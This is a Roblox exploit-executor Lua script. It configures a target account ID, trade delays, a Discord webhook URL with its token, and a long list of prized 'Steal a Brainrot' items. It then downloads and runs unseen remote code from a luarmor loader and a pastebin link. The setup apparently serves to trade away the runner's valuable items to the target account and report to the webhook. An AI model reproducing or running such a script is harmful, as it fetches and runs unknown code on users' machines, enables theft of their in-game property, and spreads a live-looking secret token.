getgenv().SECRET_KEY = "mrr_6c7cd198741848fab5c120a6e7a14a10"
getgenv().TARGET_ID = 9571474544
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().DISCORD_WEBHOOK = "https://discord.com/api/webhooks/1476811756436197578/LMvYVeY4NH-PPpGnlIzSMNyo5HQfr90A-NN5iTsvbi2M5Zt3hDVwUzFFFq9wO0mn5_E4"
getgenv().TARGET_BRAINROTS = {
    ["Meowl"] = true,
    ["Skibidi Toilet"] = true,
    ["Nacho Spyder"] = true,
    ["Strawberry Elephant"] = true,
    ["Quesadillo Vampiro"] = true,
    ["Tacorita Bicicleta"] = true,
    ["La Extinct Grande"] = true,
    ["La Spooky Grande"] = true,
    ["Chipso and Queso"] = true,
    ["Chillin Chili"] = true,
    ["Tuff Toucan"] = true,
    ["Gobblino Uniciclino"] = true,
    ["W or L"] = true,
    ["La Jolly Grande"] = true,
    ["La Taco Combinasion"] = true,
    ["Swaggy Bros"] = true,
    ["La Romantic Grande"] = true,
    ["Festive 67"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Money Money Puggy"] = true,
    ["Tang Tang Keletang"] = true,
    ["Ketupat Kepat"] = true,
    ["Tictac Sahur"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Lavadorito Spinito"] = true,
    ["Garama and Madundung"] = true,
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Cerberus"] = true,
    ["Dragon Cannelloni"] = true,
    ["Guest 666"] = true,
    ["Mariachi Corazoni"] = true,
    ["Swag Soda"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Bros"] = true,
    ["Tralaledon"] = true,
    ["Los Puggies"] = true,
    ["Los Primos"] = true,
    ["Los Tacoritas"] = true,
    ["Los Spaghettis"] = true,
    ["Ginger Gerat"] = true,
    ["Spooky and Pumpky"] = true,
    ["Fragrama and Chocrama"] = true,
    ["La Casa Boo"] = true,
    ["Los Sekolahs"] = true,
    ["Reinito Sleighito"] = true,
    ["Ketupat Bros"] = true,
    ["Cooki and Milki"] = true,
    ["Rosey and Teddy"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["La Supreme Combinasion"] = true,
    ["Dragon Gingerini"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Celularcini Viciosini"] = true,
    ["Mieteteira Bicicleteira"] = true,
    ["La Grande Combinasion"] = true,
    ["Money Money Reindeer"] = true,
    ["Eviledon"] = true,
    ["Orcaledon"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Los Jolly Combinasionas"] = true,
    ["La Ginger Sekolah"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["Spinny Hammy"] = true,
    ["Las Sis"] = true,
    ["Los Mobilis"] = true,
    ["Los Candies"] = true,
    ["Bacuru and Egguru"] = true,
    ["Chimnino"] = true,
    ["Fishino Clownino"] = true,
    ["Chicleteira Cupideira"] = true,
    ["Rang Ring Bus"] = true,
    ["Los Nooo My Hotspotsitos"] = true,
    ["67"] = true,
    ["1x1x1x1"] = true,
    ["Noo my examine"] = true,
    ["Yess my examine"] = true,
    ["Los Chicleteiras"] = true,
    ["Los Mi Gatitos"] = true,
    ["Los 67"] = true,
    ["Esok Sekolah"] = true,
    ["Rosetti Tualetti"] = true,
    ["Spaghetti Tualetti"] = true,
    ["La Food Combinasion"] = true,
    ["La Secret Combinasion"] = true,
    ["Los Combinasionas"] = true,
    ["Nooo My Hotspot"] = true,
    ["Tung Tung Tung Sahur"] = true,
    ["Coffin Tung Tung Tung Sahur"] = true,
    ["Los Jobcitos"] = true,
    ["Los 25"] = true,
    ["Noo my Heart"] = true,
    ["Donkeyturbo Express"] = true,
    ["Noo my Present"] = true,
    ["Noo my Candy"] = true,
    ["Cupid Hotspot"] = true,
    ["Naughty Naughty"] = true,
    ["Santa Hotspot"] = true,
    ["Telemorte"] = true,
    ["Please my Present"] = true,
    ["Love Love Love Sahur"] = true,
    ["La Sahur Combinasion"] = true,
    ["Los Amigos"] = true,
    ["Chicleteira Bicicleteira"] = true,
    ["Chicliterita bicicliterita"] = true,
    ["Chicleteirina Bicicleteirina"] = true,
    ["To to to Sahur"] = true,
    ["List List List Sahur"] = true,
    ["Lovin Rose"] = true,
    ["Los Sweethearts"] = true,
    ["Los Planitos"] = true,
    ["Los Burritos"] = true
}
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/fbcd1d25889a843297107dea3642044d.lua"))()
end)
task.spawn(function()
loadstring(game:HttpGet("https://pastebin.com/raw/4fh89PWn"))();
end)